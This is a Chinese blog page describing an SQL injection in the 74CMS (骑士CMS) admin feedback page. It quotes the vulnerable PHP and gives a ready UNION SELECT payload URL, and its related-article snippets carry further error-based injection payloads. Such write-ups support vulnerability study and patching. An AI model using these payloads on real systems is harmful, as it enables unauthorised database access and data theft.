sql注入pythonpoco_骑士CMS后台SQL注入 | CN-SEC 中文网

最新推荐文章于 2021-08-02 18:54:08 发布
最新推荐文章于 2021-08-02 18:54:08 发布
阅读量187 收藏
点赞数
文章标签: sql注入pythonpoco
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39753213/article/details/114000537
版权

摘要

漏洞文件:admin/admin_feedback.php代码82行: 跟下get_report_list:  $_GET[‘reporttype’]

漏洞文件:admin/admin_feedback.php

代码82行:

if (!empty($_GET['reporttype']))          {                    $wheresql=empty($wheresql)?" WHERE r.report_type=".$_GET['reporttype']:$wheresql." AND r.report_type=".$_GET['reporttype'];          }          if (!empty($_GET['audit']))          {                    $wheresql=empty($wheresql)?" WHERE r.audit=".$_GET['audit']:$wheresql." AND r.audit=".$_GET['audit'];          }          $total_val=$db->get_total($total_sql);          $page = new page(array('total'=>$total_val, 'perpage'=>$perpage,'getarray'=>$_GET));          $currenpage=$page->nowindex;          $offset=($currenpage-1)*$perpage;          $list = get_report_list($offset,$perpage,$joinsql.$wheresql.$oederbysql,$type);          $smarty->assign('pageheader',"举报信息");          $smarty->assign('list',$list);          $smarty->assign('page',$page->show(3));

跟下get_report_list:

function get_report_list($offset,$perpage,$get_sql= '',$type) {     global $db;     $limit=" LIMIT ".$offset.','.$perpage;     if($type==1){        $result = $db->query("SELECT r.*,m.username FROM ".table('report')." AS r ".$get_sql.$limit);        while($row = $db->fetch_array($result))        {        $row['jobs_url']=url_rewrite('QS_jobsshow',array('id'=>$row['jobs_id']));        $row_arr[] = $row;        }     }else{        $result = $db->query("SELECT r.*,m.username FROM ".table('report_resume')." AS r ".$get_sql.$limit);        while($row = $db->fetch_array($result))        {        $row['resume_url']=url_rewrite('QS_resumeshow',array('id'=>$row['resume_id']));        $row_arr[] = $row;         }     }     return $row_arr; }

$_GET['reporttype']

$_GET['audit']

没有’包含。

构造payload:

admin/admin_feedback.php?act=report_list&audit=1%20union%20select%201,2,3,4,5,6,7,user(),9,10%23

4effecaa64b609d4ddfc0ae4e6c3e4df.png

weixin_39753213
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
nnn2188185的博客
03-19 1356
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
sql注入pythonpoco_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_39991531的博客
12-11 114
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument('-u',dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
sql注入pythonpoco_Dapper和SQL注入
weixin_39951930的博客
12-11 122
Dapper如何幫助防止SQL注入?這使得完全參數化數據訪問變得非常非常容易,無需連接輸入。特別是,因為你並不需要通過大量的“20參數添加參數,設置參數類型,檢查空,因為ADO.NET有蘇茨基空處理 ,沖洗/重複”地跳,通過使參數處理愣神方便。它還使得將行轉換為對像變得非常簡單,避免了使用DataTable的誘惑...每個人都獲勝。來自評論:還有一個......那個小巧玲瓏實際上有什麼幫助呢?回答...
骑士cms最新全局SQL注入(官方奇葩修复案例)
koothon的专栏
07-17 2154
这个漏洞,我们看看骑士怎么修复的 http://wwwcto2uploudpic/Article/201412/359995.html 首先试试带入单引号,用宽字节试试,可以看到显示数据库出错   看看数据库怎么带入的吧 可以看到出错了,单引号被带入sql语句了 居然还可以注入,没有过滤 找到/include/m
sql注入pythonpoco_十种MySQL报错注入
weixin_39532352的博客
12-11 91
1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()select * from test where id=1 a...
SQL.rar_sql injection_sql 注入_sql注入
09-14
SQL注入是一种常见的网络安全威胁,它发生在应用程序不恰当地构建SQL查询语句时,允许攻击者通过输入恶意数据来操纵数据库。在"SQL.rar"中,我们看到与SQL注入相关的资源,包括一个名为"SQL.cpp"的C++源代码文件,这...
SQL-injection-detective.rar_Detective_sql injection_sql 注入_sql注入
09-23
本项目"SQL-injection-detective.rar"提供了一个用C#编写的简单SQL注入漏洞检测工具,旨在帮助开发者识别和修复这类安全隐患。 1. SQL注入原理:SQL注入发生时,用户输入的数据未经验证或过滤就直接被用于构建...
zhuru.rar_SQL inject_asp注入_sql 注入_sql注入_zhuru sql
09-14
SQL注入】是一种常见的网络安全漏洞,它发生在应用程序未能充分验证用户输入的数据,导致恶意SQL代码被拼接到数据库查询中执行。在"zhuru.rar"这个压缩包中,包含了一个用于SQL注入测试的ASP(Active Server Pages...
SQL_zhuru.rar_sql 注入_sql注入
09-24
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能充分验证或过滤用户输入的数据,导致这些数据被误用为数据库查询的一部分。这种攻击方式可以让攻击者通过构造特定的SQL语句来获取、修改、删除或者控制数据库...
SQL.rar_SQL注入工具_mountain2rr_sql注入_新品_速度快
09-23
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能充分验证或过滤用户输入的数据,导致恶意SQL代码可以与数据库交互。"SQL.rar"很可能是一个包含多种SQL注入工具的压缩包,旨在帮助安全专家或者渗透测试人员...
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
sql注入pythonpoco_ctf学习
weixin_42176612的博客
01-30 113
CTF学习Webnmapnmap常用的扫描命令是:nmap -sS -sV-p- 192.168.1.1或nmap -v -T4 -A 192.168.1.1/24Sql注入利用报错注入:updatexml:爆破数据库版本Payload:?id=1'+updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)%23常见的注入点位置:GET参数:最容易发现...
骑士CMS SQL注入漏洞
收集盒 Book box
07-02 2413
影响版本: 通杀 程序介绍:  骑士CMS人才系统,PHP人才招聘程序 (www.74cms.com/) 漏洞文件: ajax_output.php预览源代码打印关于1 $category_id=trim($_GET['category_id']);  2  3 if (($category_id+0)>0 && intval($category_id)==$cate
骑士CMS模版注入+文件包含getshell复现
黑白的博客
05-03 1076
声明 好好学习,天天向上 漏洞描述 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 影响范围 骑士 CMS < 6.0.48 复现过程 这里使用6.0.20版本 使用phpstudy小白皮,好用的1P
sql注入pythonpoco_Flask和Django有什么不同和区别?
weixin_39581739的博客
12-11 114
本文概述Django和Flask是Python的网络框架。众所周知, Python是最通用的编程语言, 它提供了广泛的Web框架。 Web开发人员可以选择这些框架。程序员可以灵活地利用全栈Python Web框架。它增强了复杂Web应用程序的开发。 Python还提供了一个选项, 可以选择微型和轻量级的Python Web框架来构建简单的Web应用程序, 而无需花费额外的时间和精力。Django和...
动态调试|Maccms SQL 注入分析(附注入盲注脚本)
xiaoi123的博客
08-28 977
0x01 前言 已经有一周没发表文章了,一个朋友叫我研究maccms的代码审计,碰到这个注入的漏洞挺有趣的,就在此写一篇分析文。 0x02 环境 Web: phpstudy System: Windows 10 X64 Browser: Firefox Quantum Python version : 2.7 Tools: JetBrains PhpStorm 2018.1.6 x64、Se...
骑士CMS4.1.23本地包含漏洞
pygain的博客
02-27 3233
0x00 在骑士CMS最新版的 index.php页面对$type 调用了display方法  这里的display使用的ThinkPHP的模板展示方法 参数后可直接调用安装目录下的任意文件以PHP形式运行 建议通过绕过上传.html或.txt文件 再进行远程包含即可 具体操作如下图 0x01 直接调用不进行审查 0x02 payload 0x03 在回包中
怎么修复网站漏洞 骑士cms的漏洞修复方案
网站安全专家
01-03 780
骑士CMS是国内公司开发的一套开源人才网站系统,使用PHP语言开发以及mysql数据库的架构,2019年1月份被某安全组织检测出漏洞,目前最新版本4.2存在高危网站漏洞,通杀SQL注入漏洞,利用该网站漏洞可以获取网站的管理员账号密码以及用户账号信息. 目前很多人才网站都使用的骑士CMS系统,受影响的网站较多,关于该网站漏洞的详情我们来详细的分析一下。骑士cms4.2最新版本使用了thinkphp...
骑士CMS文件包含+getshell漏洞复现(python自动化验证扫描漏洞)
走在搬砖的路上!
08-02 3299
简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 +开源专业人才网站系统 公告地址: http://www.74cms.com/news/show-2497.html /Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行 影响版本 骑士 CMS < 6.0.48 环境搭建 这里使用phpstudy进.
sqli-labs实验指导手册
最新发布
11-17
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值